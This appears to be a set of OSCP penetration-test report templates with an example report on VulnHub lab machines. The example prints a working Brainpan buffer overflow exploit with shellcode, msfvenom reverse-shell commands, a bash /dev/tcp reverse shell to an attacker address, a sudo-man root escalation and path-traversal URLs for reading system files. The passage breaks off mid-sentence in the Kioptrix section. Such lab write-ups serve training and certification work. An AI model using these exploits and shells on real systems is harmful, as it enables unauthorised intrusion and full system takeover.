[
  {
    "path": "Exam Report template.md",
    "content": "# Offensive Security - Penetration Test Report for OSCP Exam\r\n\r\n<!-- Insert your details here -->\r\n[email@email.email]\r\nOSID: [OS-XXXXX]\r\n[Date]\r\n\r\n# Table of Contents\r\n\r\n# Outline\r\n\r\n## Introduction\r\n\r\nThe Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security OSCP Certification Exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the Exam Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Offensive Security Exam network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards the Offensive Security Exam Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Exam Lab systems. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security.\r\n\r\n<!-- Update number of compromised machines -->\r\nDuring the assessment, several alarming vulnerabilities were identified on Offensive Security’s exam network. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, XXXXXXX systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n<!-- Update the below sections with the right subnets, hosts, and a brief description of the initial exploited vulnerability -->\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY\r\n- **X.X.X.X (Hostname)** - *Xpts* - Remote (Custom) Buffer Overflow\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each identified vulnerability, patching recommendations are provided in the following chapters.\r\n\r\nOne thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. In this chapter, a breakdown of of the used methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range was in scope:\r\n\r\n<!-- Update the list of subnets -->\r\n- IP RANGE (X.X.X.X)\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n<!-- Update this paragraph with the appropriate amount of compromised machines -->\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **5** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n<!-- Update chosen IP for Metasploit -->\r\nIt should be noted that the Metasploit Framework was utilised for one box during the execution of these tests. The IP address chosen for Metasploit usage was **[XXX.XXX.XXX.XXX]**.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system.\r\n\r\n# Exploitation Details\r\n\r\n<!-- Insert machine write-ups from .md template here -->"
  },
  {
    "path": "Examples/Example Report _ No Styling.md",
    "content": "# Example Report - Penetration Test Report for VulnHub Internal Labs\r\n\r\nme@localhost\r\n\r\nSOME-1D3NT1F13R\r\n\r\nToday\r\n\r\n# Outline\r\n## Introduction\r\n\r\nThe Example Lab penetration test report contains all efforts that were conducted in order to pass The Example Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as technical knowledge.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Example Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards The Example Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate internal Lab systems – including but not limited to the internal domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting back findings.\r\n\r\nDuring the assessment, several alarming vulnerabilities were identified on internal networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n- 10.0.0.138 (BrainPan) - Buffer Overflow\r\n- 10.0.0.139 (Kioptrix2014) - Local File Inclusion and remote code execution\r\n- 10.0.100.105 (Zico) - Default credentials and arbitrary file write\r\n- 10.0.100.107 (LazyAdmin) - Misconfigured SMB share and weak credentials\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided.\r\n\r\nOne thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to test how well The Example Lab environments are secured.\r\nBelow, a breakdown of the applied methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range is in scope:\r\n\r\n- The 'internal' subnet: 10.0.0.0/16\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **4** out of **4** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. No additional cleanup should be required.\r\n\r\n# Exploitation Details: Internal Subnet (10.0.0.0/16)\r\n\r\n## System IP 10.0.0.138 (Brainpan)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.0.138      |\r\n| Hostname          | Brainpan        |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nTo exploit Brainpan, a buffer overflow exploit was developed based on a binary that was disclosed via the web server. Once we successfully developed an exploit for the program on our test server, we succesfully use it to gain a shell on the target system. We break out of the virtual Windows environment and exploit a `sudo` binary to gain command execution as root.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\nPORT      STATE SERVICE REASON  VERSION                                                                             \r\n9999/tcp  open  abyss?  syn-ack                                                                                     \r\n| fingerprint-strings:                                                                                              \r\n|   NULL: \r\n|     _| _| \r\n|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| \r\n|     _|_| _| _| _| _| _| _| _| _| _| _| _|\r\n|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|\r\n|     [________________________ WELCOME TO BRAINPAN _________________________]\r\n|_    ENTER THE PASSWORD\r\n10000/tcp open  http    syn-ack SimpleHTTPServer 0.6 (Python 2.7.3)\r\n|_http-server-header: SimpleHTTP/0.6 Python/2.7.3\r\n|_http-title: Site doesn't have a title (text/html).\r\n1 service unrecognized despite returning data.\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN \r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\r\n    inet 127.0.0.1/8 scope host lo\r\n    inet6 ::1/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000\r\n    link/ether 00:0c:29:da:50:81 brd ff:ff:ff:ff:ff:ff\r\n    inet 10.0.0.138/24 brd 10.0.0.255 scope global eth0\r\n    inet6 fe80::20c:29ff:feda:5081/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN qlen 1000\r\n    link/ether 00:0c:29:da:50:8b brd ff:ff:ff:ff:ff:ff\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nN/A\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds two non-default services. Port 9999 seems to be running a terminal application, but we need a password to access it.\r\n\r\n```\r\n# nc 10.0.0.138 9999\r\n_|                            _|                                        \r\n_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \r\n_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\r\n_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\r\n_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\r\n                                            _|                          \r\n                                            _|\r\n\r\n[________________________ WELCOME TO BRAINPAN _________________________]\r\n                          ENTER THE PASSWORD                              \r\n\r\n                          >> hello\r\n                          ACCESS DENIED\r\n```\r\n\r\nPort 10000 is identified as `SimpleHTTPServer`, and browsing to it it seems to return a banner image on safe coding practices. Enumerating subfolders the webserver with `gobuster`, we find `/bin` which is listable and contains `brainpan.exe`. Let's analyze this application!\r\n\r\n```\r\n# gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\r\n/bin (Status: 301)\r\n```\r\n\r\nWe load the binary to our windows VM and start fuzzing it. We find that if we send 1000 \"A\" characters as our password, the application hangs. Inspecting it in our debugging application (Unity debugger) we find that we have overwritten the stack, including `EIP`!\r\n\r\n![a7b7b9d025ee7b2331b0360b7f1a60eb.png](_resources/bd626d2837644bc5908d1a10c044bc61.png)\r\n\r\n```\r\nmsf-pattern_create -l 1000\r\n```\r\n\r\nWe then send that string as our password, and see that the EIP is overwritten with the value `35724134`. We can now identify the offset as follows.\r\n\r\n```\r\n# msf-pattern_offset -l 1000 -q 35724134\r\n[*] Exact match at offset 524\r\n```\r\n\r\nThis would imply that we *exactly* overwrite `EIP` if we send 524 \"A\" characters and 4 \"B\" characters. Doing exactly that, we indeed manage to overwrite `EIP` with precision.\r\n\r\n![3fccedb5d57ec60e0ed35b3f6b4cf1df.png](_resources/43674b8c9f7f41ea8785d605952406e6.png)\r\n\r\nNow, we send an array of the binary characters ranging from `\\x01` to `\\xff` in our buffer, to identify bad characters. Inspecting the characters in our buffer, none seem to have disappeared or caused issues in the buffer. As such, our only bad character is `\\x00`, which we already removed.\r\n\r\nNow to generate a payload. For our test system, we generate the following payload. Note that once we deploy it on the target, we need to replace this payload with one generated with a different `LHOST` address.\r\n\r\n```\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.155 LPORT=443 EXITFUNC=thread -f py -b \"\\x00\"\r\n```\r\n\r\nThis results in a big payload, which we include in our script. We prepend several `\\x90` (NOP) characters to ensure the payload is triggered correctly.\r\n\r\nFinally, we have to find a `JMP ESP` or `CALL ESP` instruction to instruct the program to actually execute our payload. Using `msf-nasm_shell` to find the respective opcodes, we find that we can use `FFE4` or `FFD4`.\r\n\r\n```\r\n# msf-nasm_shell \r\nnasm > jmp esp\r\n00000000  FFE4              jmp esp\r\nnasm > call esp\r\n00000000  FFD4              call esp\r\n```\r\n\r\nWe can find memory addresses with these instructions in our debugger, using the `mona.py` plugin. First, we run `!mona modules` to identify an unprotected module.\r\n\r\n![2917175e6f9be3d4ce5f8045ad575d14.png](_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png)\r\n\r\nWe find that we can use the binary itself (`brainpan.exe`), since it doesn't have any protections. Using this information, we run the following query to locate `jmp esp` instructions in memory!\r\n\r\n```\r\n!mona find -s '\\xff\\xe4' -m brainpan.exe\r\n```\r\n\r\nWe find one address: `0x311712f3`. This doesn't contain any bad characters, so should be usable. We update our `EIP` overwrite in our script to the Little Endian notation of that address, which is `\"\\xf3\\x12\\x17\\x31\"`. We are now ready to try our exploit.\r\n\r\nRunning the exploit on our test machine, we get a shell back!\r\n\r\n![20ae0f542aec4372a4ddf58375ea0835.png](_resources/78f9b63a3ff44b8dbddeb34bb174f469.png)\r\n\r\nPerfect. Now we only have to re-generate our payload and replace our target IP address to weaponize the exploit.\r\n\r\n```\r\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.0.100.108 LPORT=443 EXITFUNC=thread -f py -b \"\\x00\"\r\n```\r\n\r\nThe final exploit code is as follows:\r\n\r\n```python\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\n\r\ntarget = \"10.0.0.138\"\r\nport = 9999\r\n\r\n# badchars: \\x00\r\n\r\nbuf =  b\"\"\r\nbuf += b\"\\xbf\\xb0\\x6b\\xdc\\x19\\xdb\\xd7\\xd9\\x74\\x24\\xf4\\x5d\\x29\"\r\nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x7d\\x0e\\x03\\xcd\\x65\\x3e\"\r\nbuf += b\"\\xec\\xd1\\x92\\x3c\\x0f\\x29\\x63\\x21\\x99\\xcc\\x52\\x61\\xfd\"\r\nbuf += b\"\\x85\\xc5\\x51\\x75\\xcb\\xe9\\x1a\\xdb\\xff\\x7a\\x6e\\xf4\\xf0\"\r\nbuf += b\"\\xcb\\xc5\\x22\\x3f\\xcb\\x76\\x16\\x5e\\x4f\\x85\\x4b\\x80\\x6e\"\r\nbuf += b\"\\x46\\x9e\\xc1\\xb7\\xbb\\x53\\x93\\x60\\xb7\\xc6\\x03\\x04\\x8d\"\r\nbuf += b\"\\xda\\xa8\\x56\\x03\\x5b\\x4d\\x2e\\x22\\x4a\\xc0\\x24\\x7d\\x4c\"\r\nbuf += b\"\\xe3\\xe9\\xf5\\xc5\\xfb\\xee\\x30\\x9f\\x70\\xc4\\xcf\\x1e\\x50\"\r\nbuf += b\"\\x14\\x2f\\x8c\\x9d\\x98\\xc2\\xcc\\xda\\x1f\\x3d\\xbb\\x12\\x5c\"\r\nbuf += b\"\\xc0\\xbc\\xe1\\x1e\\x1e\\x48\\xf1\\xb9\\xd5\\xea\\xdd\\x38\\x39\"\r\nbuf += b\"\\x6c\\x96\\x37\\xf6\\xfa\\xf0\\x5b\\x09\\x2e\\x8b\\x60\\x82\\xd1\"\r\nbuf += b\"\\x5b\\xe1\\xd0\\xf5\\x7f\\xa9\\x83\\x94\\x26\\x17\\x65\\xa8\\x38\"\r\nbuf += b\"\\xf8\\xda\\x0c\\x33\\x15\\x0e\\x3d\\x1e\\x72\\xe3\\x0c\\xa0\\x82\"\r\nbuf += b\"\\x6b\\x06\\xd3\\xb0\\x34\\xbc\\x7b\\xf9\\xbd\\x1a\\x7c\\xfe\\x97\"\r\nbuf += b\"\\xdb\\x12\\x01\\x18\\x1c\\x3b\\xc6\\x4c\\x4c\\x53\\xef\\xec\\x07\"\r\nbuf += b\"\\xa3\\x10\\x39\\x87\\xf3\\xbe\\x92\\x68\\xa3\\x7e\\x43\\x01\\xa9\"\r\nbuf += b\"\\x70\\xbc\\x31\\xd2\\x5a\\xd5\\xd8\\x29\\x0d\\xd0\\x1c\\x55\\xa1\"\r\nbuf += b\"\\x8c\\x1e\\x95\\x38\\xf6\\x96\\x73\\x50\\x18\\xff\\x2c\\xcd\\x81\"\r\nbuf += b\"\\x5a\\xa6\\x6c\\x4d\\x71\\xc3\\xaf\\xc5\\x76\\x34\\x61\\x2e\\xf2\"\r\nbuf += b\"\\x26\\x16\\xde\\x49\\x14\\xb1\\xe1\\x67\\x30\\x5d\\x73\\xec\\xc0\"\r\nbuf += b\"\\x28\\x68\\xbb\\x97\\x7d\\x5e\\xb2\\x7d\\x90\\xf9\\x6c\\x63\\x69\"\r\nbuf += b\"\\x9f\\x57\\x27\\xb6\\x5c\\x59\\xa6\\x3b\\xd8\\x7d\\xb8\\x85\\xe1\"\r\nbuf += b\"\\x39\\xec\\x59\\xb4\\x97\\x5a\\x1c\\x6e\\x56\\x34\\xf6\\xdd\\x30\"\r\nbuf += b\"\\xd0\\x8f\\x2d\\x83\\xa6\\x8f\\x7b\\x75\\x46\\x21\\xd2\\xc0\\x79\"\r\nbuf += b\"\\x8e\\xb2\\xc4\\x02\\xf2\\x22\\x2a\\xd9\\xb6\\x43\\xc9\\xcb\\xc2\"\r\nbuf += b\"\\xeb\\x54\\x9e\\x6e\\x76\\x67\\x75\\xac\\x8f\\xe4\\x7f\\x4d\\x74\"\r\nbuf += b\"\\xf4\\x0a\\x48\\x30\\xb2\\xe7\\x20\\x29\\x57\\x07\\x96\\x4a\\x72\"\r\n\r\nbuffer = \"A\" * 524\r\nbuffer += \"\\xf3\\x12\\x17\\x31\"\r\nbuffer += \"\\x90\" * 32 + buf\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.connect((target,port))\r\nprint (sock.recv(1024))\r\nsock.send(buffer)\r\nprint (sock.recv(1024))\r\nsock.close()\r\n```\r\n\r\nRunning the exploit, we get a shell back as user Puck!\r\n\r\n##### Severity\r\n\r\n`High` - An attacker could identify and exploit this vulnerability to remotely gain code execution on the machine.\r\n\r\n##### Remediation\r\n\r\n- Patch the `brainpan.exe` binary to properly allocate buffer space and sanitize user inputs\r\n- Limit network access to the machine\r\n\r\n##### Proof\r\n\r\n![d66c74dd136d44b2e0b8aa1968f8ee6d.png](_resources/3fcfd682f31f487fa15a1e936f6d54e4.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nOddly enough, our new shell seems to be on Linux filesystem looking at the directories in the root directory. This implies that the Windows binary we found was running via `wine` or a similar emulation environment\r\n\r\n![3fe07241c0b2ef536ff825e501317e50.png](_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png)\r\n\r\nTo prevent confusion and avoid limitations, we can turn this shell into a regular `sh` shell by spawning a new reverse shell with the regular Linux `sh` binary. For that we can run the following from our prompt\r\n\r\n```\r\n/bin/sh -i >& /dev/tcp/10.0.0.128/443 0>&1\r\n```\r\n\r\n![af1fcd5da95378a05cc417d6491f1509.png](_resources/7bafa472ec614deabdd9cfca82d1119e.png)\r\n\r\nOn our new shell, we can gain a full TTY as follows.\r\n\r\n```\r\n/usr/bin/script -qc /bin/bash /dev/null\r\n```\r\n\r\n```\r\n$ sudo -l\r\nMatching Defaults entries for puck on this host:\r\n    env_reset, mail_badpass,\r\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser puck may run the following commands on this host:\r\n    (root) NOPASSWD: /home/anansi/bin/anansi_util\r\n```\r\n\r\nThat seems interesting! We cannot read the binary file to see what it does, so let's just run it.\r\n\r\n```\r\n$ sudo /home/anansi/bin/anansi_util\r\nUsage: /home/anansi/bin/anansi_util [action]\r\nWhere [action] is one of:\r\n  - network\r\n  - proclist\r\n  - manual [command]\r\n```\r\n\r\nInteresting, looks like we can run some commands as root using this utility. After some playing around, the `manual` command seems to be the most promising. Running this command opens the manpage of a certain command that we specify as root.\r\n\r\n```\r\n$ sudo /home/anansi/bin/anansi_util manual bash\r\nNo manual entry for manual\r\nWARNING: terminal is not fully functional\r\n-  (press RETURN)\r\nBASH(1)                                                                BASH(1)\r\n\r\nNAME\r\n       bash - GNU Bourne-Again SHell\r\n\r\nSYNOPSIS\r\n       bash [options] [file]\r\n\r\nCOPYRIGHT\r\n       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.\r\n\r\nDESCRIPTION\r\n       Bash  is  an  sh-compatible  command language interpreter that executes\r\n       commands read from the standard input or from a file.  Bash also incor‐\r\n       porates useful features from the Korn and C shells (ksh and csh).\r\n\r\n       Bash  is  intended  to  be a conformant implementation of the Shell and\r\n       Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard\r\n       1003.1).  Bash can be configured to be POSIX-conformant by default.\r\n\r\nOPTIONS\r\n       All  of  the  single-character shell options documented in the descrip‐\r\n       tion of the set builtin command can be used as options when  the  shell\r\n Manual page bash(1) line 1 (press h for help or q to quit)\r\n```\r\n\r\nThis isn't too interesting on itself, but we are dropped into an interactive `less`-like prompt since the content doesn't fit on the screen. As listed [here](https://gtfobins.github.io/gtfobins/man/#sudo), we can run system commands by prepending `!`, giving us command execution as root!\r\n\r\nRunning `!bash` at the manpage prompt drops us into a root shell, giving us full access over the system.\r\n\r\n##### Severity\r\n\r\n`High` - Any user with sudo permissions on the `anansi_util` binary may escalate their privileges to gain full control of the system.\r\n\r\n##### Remediation\r\n\r\n- Restrict `sudo` access on a least-privilege basis\r\n- Remove or restrict the `manual` functionality within the `anansi_util` binary\r\n\r\n##### Proof\r\n\r\n![68784bdfb72a2e608d14a626cd6ed655.png](_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png)\r\n\r\n## System IP 10.0.0.139 (Kioptrix2014)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.0.139      |\r\n| Hostname          | Kioptrix2014    |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nThis machine required several steps to exploit. First, we identify a Local File Inclusion vulnerability in the `pChart` system on the web server. We use this to read the apache configuration files and identify user-agent based filtering for the web server on port 8080. Once there, we identify the `phptax` application which we can use to gain command execution as user `www`. Since the machine is running FreeBSD version 9, we utilize a kernel exploit to escalate our privileges to root.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n# Nmap 7.80 scan initiated Mon May  4 11:00:08 2020 as: nmap -sV -sC -p- -v -o nmapfull.out 10.0.0.139\r\nNmap scan report for 10.0.0.139\r\nHost is up (0.00047s latency).\r\nNot shown: 65532 filtered ports\r\nPORT     STATE  SERVICE VERSION\r\n22/tcp   closed ssh\r\n80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)\r\n| http-methods: \r\n|_  Supported Methods: HEAD\r\n|_http-title: Site doesn't have a title (text/html).\r\n8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)\r\n|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8\r\n|_http-title: 403 Forbidden\r\nMAC Address: 00:0C:29:FE:67:D7 (VMware)\r\n\r\nRead data files from: /usr/bin/../share/nmap\r\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\r\n# Nmap done at Mon May  4 11:02:18 2020 -- 1 IP address (1 host up) scanned in 129.88 seconds\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\nem0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500\r\n        options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>\r\n        ether 00:0c:29:fe:67:d7\r\n        inet 10.0.0.139 netmask 0xffffff00 broadcast 10.0.0.255\r\n        nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>\r\n        media: Ethernet autoselect (1000baseT <full-duplex>)\r\n        status: active\r\nplip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500\r\n        nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>\r\nlo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384\r\n        options=3<RXCSUM,TXCSUM>\r\n        inet6 ::1 prefixlen 128 \r\n        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 \r\n        inet 127.0.0.1 netmask 0xff000000 \r\n        nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>\r\nipfw0: flags=8801<UP,SIMPLEX,MULTICAST> metric 0 mtu 65536 \r\n        nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nN/A\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds two ports open, 80 and 8080. Port 8080 seems to reject all of our requests with an 403 error, and port 80 just returns \"It works!\". However, by inspecting the source, code, we see a reference to `/pChart2.1.3/index.php`.\r\n\r\n![ffb80df9362fb3c922d028c49da290b3.png](_resources/5aaf06cbb9f34198ade6738ce59f6c87.png)\r\n\r\nVisiting that page, we get to see the pChart system v2.1.3 without authentication. This version seems to be vulnerable to XSS and Path Traversal, as outlined [here](https://www.exploit-db.com/exploits/31173). Testing out the vulnerabilities for ourselves we can indeed read arbitrary files through the path traversal. For example, we can read `/etc/passwd`.\r\n\r\n![3124b1f27f3ccc417fc3881795114ecd.png](_resources/8b57d11edb854ab1af23239e63b089ef.png)\r\n\r\nThe passwd file also lists we are dealing with FreeBSD 9, which is interesting since this affects the paths we are dealing with. We can find the HTTP access log here, for example.\r\n\r\n```\r\nhttp://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fvar/log/httpd-access.log\r\n```\r\n\r\nUnfortunately, any PHP that we inject through user agent poisoning doesn't seem to be executed and is reflected back to us. Looks like we'll have to find another way in. Enumerating more files, we find the apache configuration.\r\n\r\n```\r\nhttp://10.0.0.139/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf\r\n```\r\n\r\nNear the bottom, it contains some interesting information about the vhost on port `8080`:\r\n\r\n```\r\nSetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser\r\n\r\n<VirtualHost *:8080>\r\n    DocumentRoot /usr/local/www/apache22/data2\r\n\r\n<Directory \"/usr/local/www/apache22/data2\">\r\n    Options Indexes FollowSymLinks\r\n    AllowOverride All\r\n    Order allow,deny\r\n    Allow from env=Mozilla4_browser\r\n</Directory>\r\n\r\n</VirtualHost>\r\n```\r\n\r\nIn short, it sets an environment variable if our user agent begins with \"Mozilla/4.0\", and only allows us access if the environment variable is set. AKA, we should be able to bypass the 403 